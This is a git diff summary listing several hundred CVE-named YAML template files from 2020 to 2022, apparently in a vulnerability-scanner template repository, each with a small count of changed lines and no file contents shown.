http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7209.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 2 +- http/cves/2020/CVE-2020-8654.yaml | 2 +- http/cves/2020/CVE-2020-8657.yaml | 2 +- http/cves/2020/CVE-2020-8771.yaml | 2 +- http/cves/2020/CVE-2020-8772.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9043.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9483.yaml | 2 +- http/cves/2020/CVE-2020-9484.yaml | 2 +- http/cves/2020/CVE-2020-9547.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-1497.yaml | 2 +- http/cves/2021/CVE-2021-1498.yaml | 2 +- http/cves/2021/CVE-2021-1499.yaml | 2 +- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 4 ++-- http/cves/2021/CVE-2021-20158.yaml | 4 ++-- http/cves/2021/CVE-2021-20167.yaml | 4 ++-- http/cves/2021/CVE-2021-20323.yaml | 2 +- http/cves/2021/CVE-2021-20617.yaml | 4 ++-- http/cves/2021/CVE-2021-20792.yaml | 4 ++-- http/cves/2021/CVE-2021-21087.yaml | 4 ++-- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21345.yaml | 2 +- http/cves/2021/CVE-2021-2135.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21816.yaml | 2 +- http/cves/2021/CVE-2021-21972.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-21985.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 4 ++-- http/cves/2021/CVE-2021-22122.yaml | 4 ++-- http/cves/2021/CVE-2021-22145.yaml | 4 ++-- http/cves/2021/CVE-2021-23241.yaml | 2 +- http/cves/2021/CVE-2021-24146.yaml | 2 +- http/cves/2021/CVE-2021-24150.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24170.yaml | 2 +- http/cves/2021/CVE-2021-24176.yaml | 2 +- http/cves/2021/CVE-2021-24210.yaml | 2 +- http/cves/2021/CVE-2021-24212.yaml | 2 +- http/cves/2021/CVE-2021-24213.yaml | 4 ++-- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24215.yaml | 2 +- http/cves/2021/CVE-2021-24219.yaml | 2 +- http/cves/2021/CVE-2021-24220.yaml | 2 +- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24236.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24274.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24295.yaml | 2 +- http/cves/2021/CVE-2021-24298.yaml | 2 +- http/cves/2021/CVE-2021-24300.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24335.yaml | 2 +- http/cves/2021/CVE-2021-24342.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24364.yaml | 2 +- http/cves/2021/CVE-2021-24370.yaml | 2 +- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24389.yaml | 2 +- http/cves/2021/CVE-2021-24406.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24435.yaml | 2 +- http/cves/2021/CVE-2021-24436.yaml | 2 +- http/cves/2021/CVE-2021-24452.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24488.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24522.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24627.yaml | 2 +- http/cves/2021/CVE-2021-24657.yaml | 2 +- http/cves/2021/CVE-2021-24666.yaml | 2 +- http/cves/2021/CVE-2021-24681.yaml | 4 ++-- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 4 ++-- http/cves/2021/CVE-2021-24791.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24876.yaml | 2 +- http/cves/2021/CVE-2021-24878.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24910.yaml | 2 +- http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24934.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-24947.yaml | 2 +- http/cves/2021/CVE-2021-24956.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 2 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-24987.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 2 +- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 +- http/cves/2021/CVE-2021-25028.yaml | 2 +- http/cves/2021/CVE-2021-25032.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25055.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25082.yaml | 4 ++-- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25112.yaml | 2 +- http/cves/2021/CVE-2021-25118.yaml | 2 +- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25161.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26599.yaml | 2 +- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 4 ++-- http/cves/2021/CVE-2021-27124.yaml | 2 +- http/cves/2021/CVE-2021-27132.yaml | 2 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27858.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-27964.yaml | 2 +- http/cves/2021/CVE-2021-28149.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28151.yaml | 2 +- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28799.yaml | 4 ++-- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29006.yaml | 2 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29441.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29505.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-3007.yaml | 4 ++-- http/cves/2021/CVE-2021-30116.yaml | 2 +- http/cves/2021/CVE-2021-30118.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-30175.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30203.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-31316.yaml | 2 +- http/cves/2021/CVE-2021-31324.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31856.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-32305.yaml | 2 +- http/cves/2021/CVE-2021-32478.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 2 +- http/cves/2021/CVE-2021-32853.yaml | 2 +- http/cves/2021/CVE-2021-3287.yaml | 2 +- http/cves/2021/CVE-2021-3293.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33045.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33558.yaml | 2 +- http/cves/2021/CVE-2021-33690.yaml | 2 +- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-33829.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34370.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-34622.yaml | 2 +- http/cves/2021/CVE-2021-34624.yaml | 2 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35323.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36380.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-36646.yaml | 2 +- http/cves/2021/CVE-2021-36873.yaml | 2 +- http/cves/2021/CVE-2021-37216.yaml | 2 +- http/cves/2021/CVE-2021-37292.yaml | 2 +- http/cves/2021/CVE-2021-37305.yaml | 2 +- http/cves/2021/CVE-2021-37573.yaml | 4 ++-- http/cves/2021/CVE-2021-37589.yaml | 2 +- http/cves/2021/CVE-2021-37598.yaml | 4 ++-- http/cves/2021/CVE-2021-37704.yaml | 2 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38146.yaml | 4 ++-- http/cves/2021/CVE-2021-38147.yaml | 2 +- http/cves/2021/CVE-2021-38154.yaml | 2 +- http/cves/2021/CVE-2021-3831.yaml | 2 +- http/cves/2021/CVE-2021-38647.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-38751.yaml | 2 +- http/cves/2021/CVE-2021-39141.yaml | 2 +- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39312.yaml | 2 +- http/cves/2021/CVE-2021-39316.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39322.yaml | 2 +- http/cves/2021/CVE-2021-39341.yaml | 2 +- http/cves/2021/CVE-2021-39350.yaml | 2 +- http/cves/2021/CVE-2021-39411.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40272.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40859.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 2 +- http/cves/2021/CVE-2021-41282.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 4 ++-- http/cves/2021/CVE-2021-41460.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41569.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41691.yaml | 2 +- http/cves/2021/CVE-2021-41773.yaml | 4 ++-- http/cves/2021/CVE-2021-41826.yaml | 2 +- http/cves/2021/CVE-2021-41878.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 2 +- http/cves/2021/CVE-2021-42551.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42663.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 2 +- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 2 +- http/cves/2021/CVE-2021-43831.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 2 +- http/cves/2021/CVE-2021-44228.yaml | 4 ++-- http/cves/2021/CVE-2021-44260.yaml | 2 +- http/cves/2021/CVE-2021-4436.yaml | 4 ++-- http/cves/2021/CVE-2021-44451.yaml | 4 ++-- http/cves/2021/CVE-2021-4448.yaml | 4 ++-- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-4462.yaml | 2 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-45027.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45420.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45467.yaml | 2 +- http/cves/2021/CVE-2021-45793.yaml | 2 +- http/cves/2021/CVE-2021-45811.yaml | 2 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46104.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 2 +- http/cves/2021/CVE-2021-46379.yaml | 2 +- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46418.yaml | 2 +- http/cves/2021/CVE-2021-46419.yaml | 2 +- http/cves/2022/CVE-2022-0087.yaml | 2 +- http/cves/2022/CVE-2022-0140.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 2 +- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0165.yaml | 2 +- http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 2 +- http/cves/2022/CVE-2022-0250.yaml | 2 +- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0381.yaml | 2 +- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0424.yaml | 2 +- http/cves/2022/CVE-2022-0429.yaml | 2 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0437.yaml | 2 +- http/cves/2022/CVE-2022-0441.yaml | 2 +- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0535.yaml | 2 +- http/cves/2022/CVE-2022-0591.yaml | 2 +- http/cves/2022/CVE-2022-0592.yaml | 2 +- http/cves/2022/CVE-2022-0594.yaml | 2 +- http/cves/2022/CVE-2022-0595.yaml | 2 +- http/cves/2022/CVE-2022-0597.yaml | 2 +- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0666.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 4 ++-- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 4 ++-- http/cves/2022/CVE-2022-0765.yaml | 4 ++-- http/cves/2022/CVE-2022-0769.yaml | 4 ++-- http/cves/2022/CVE-2022-0773.yaml | 4 ++-- http/cves/2022/CVE-2022-0783.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0787.yaml | 2 +- http/cves/2022/CVE-2022-0788.yaml | 2 +- http/cves/2022/CVE-2022-0817.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 4 ++-- http/cves/2022/CVE-2022-0873.yaml | 4 ++-- http/cves/2022/CVE-2022-0879.yaml | 2 +- http/cves/2022/CVE-2022-0885.yaml | 4 ++-- http/cves/2022/CVE-2022-0899.yaml | 2 +- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 2 +- http/cves/2022/CVE-2022-0949.yaml | 2 +- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1020.yaml | 2 +- http/cves/2022/CVE-2022-1026.yaml | 2 +- http/cves/2022/CVE-2022-1029.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1119.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1168.yaml | 2 +- http/cves/2022/CVE-2022-1170.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 2 +- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1392.yaml | 2 +- http/cves/2022/CVE-2022-1398.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1574.yaml | 2 +- http/cves/2022/CVE-2022-1580.yaml | 4 ++-- http/cves/2022/CVE-2022-1595.yaml | 2 +- http/cves/2022/CVE-2022-1597.yaml | 2 +- http/cves/2022/CVE-2022-1598.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 2 +- http/cves/2022/CVE-2022-1724.yaml | 2 +- http/cves/2022/CVE-2022-1756.yaml | 2 +- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1904.yaml | 2 +- http/cves/2022/CVE-2022-1906.yaml | 2 +- http/cves/2022/CVE-2022-1916.yaml | 2 +- http/cves/2022/CVE-2022-1933.yaml | 2 +- http/cves/2022/CVE-2022-1946.yaml | 2 +- http/cves/2022/CVE-2022-1950.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-2130.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-2168.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 2 +- http/cves/2022/CVE-2022-2219.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22733.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 4 ++-- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22963.yaml | 2 +- http/cves/2022/CVE-2022-22965.yaml | 4 ++-- http/cves/2022/CVE-2022-22972.yaml | 2 +- http/cves/2022/CVE-2022-23102.yaml | 2 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-23397.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 2 +- http/cves/2022/CVE-2022-2373.yaml | 2 +- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 4 ++-- http/cves/2022/CVE-2022-23808.yaml | 2 +- http/cves/2022/CVE-2022-23881.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-24086.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2022/CVE-2022-24129.yaml | 2 +- http/cves/2022/CVE-2022-24223.yaml | 2 +- http/cves/2022/CVE-2022-24265.yaml | 2 +- http/cves/2022/CVE-2022-24384.yaml | 2 +- http/cves/2022/CVE-2022-2461.yaml | 2 +- http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2022/CVE-2022-24627.yaml | 2 +- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24819.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25322.yaml | 2 +- http/cves/2022/CVE-2022-2535.yaml | 2 +- http/cves/2022/CVE-2022-2544.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25489.yaml | 2 +- http/cves/2022/CVE-2022-25497.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-2552.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 4 ++-- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26159.yaml | 2 +- http/cves/2022/CVE-2022-26263.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-26271.yaml | 2 +- http/cves/2022/CVE-2022-2633.yaml | 2 +- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-26585.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 2 +- http/cves/2022/CVE-2022-2756.yaml | 2 +- http/cves/2022/CVE-2022-27849.yaml | 2 +- http/cves/2022/CVE-2022-27924.yaml | 4 ++-- http/cves/2022/CVE-2022-27927.yaml | 2 +- http/cves/2022/CVE-2022-27984.yaml | 2 +- http/cves/2022/CVE-2022-27985.yaml | 2 +- http/cves/2022/CVE-2022-28032.yaml | 2 +- http/cves/2022/CVE-2022-28079.yaml | 4 ++-- http/cves/2022/CVE-2022-28080.yaml | 4 ++-- http/cves/2022/CVE-2022-28117.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28290.yaml | 2 +- http/cves/2022/CVE-2022-28508.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 2 +- http/cves/2022/CVE-2022-28666.yaml | 2 +- http/cves/2022/CVE-2022-28923.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 2 +- http/cves/2022/CVE-2022-29005.yaml | 2 +- http/cves/2022/CVE-2022-29006.yaml | 2 +- http/cves/2022/CVE-2022-29013.yaml | 2 +- http/cves/2022/CVE-2022-29081.yaml | 2 +- http/cves/2022/CVE-2022-29316.yaml | 2 +- http/cves/2022/CVE-2022-29349.yaml | 2 +- http/cves/2022/CVE-2022-29383.yaml | 2 +- http/cves/2022/CVE-2022-29455.yaml | 2 +- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30513.yaml | 2 +- http/cves/2022/CVE-2022-30514.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-3062.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-31101.yaml | 2 +- http/cves/2022/CVE-2022-31260.yaml | 2 +- http/cves/2022/CVE-2022-31299.yaml | 2 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31470.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31711.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-31974.yaml | 2 +- http/cves/2022/CVE-2022-31975.yaml | 2 +- http/cves/2022/CVE-2022-31977.yaml | 2 +- http/cves/2022/CVE-2022-31978.yaml | 2 +- http/cves/2022/CVE-2022-31984.yaml | 2 +- http/cves/2022/CVE-2022-32007.yaml | 2 +- http/cves/2022/CVE-2022-32015.yaml | 2 +- http/cves/2022/CVE-2022-32018.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-3242.yaml | 2 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 2 +- http/cves/2022/CVE-2022-33198.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- 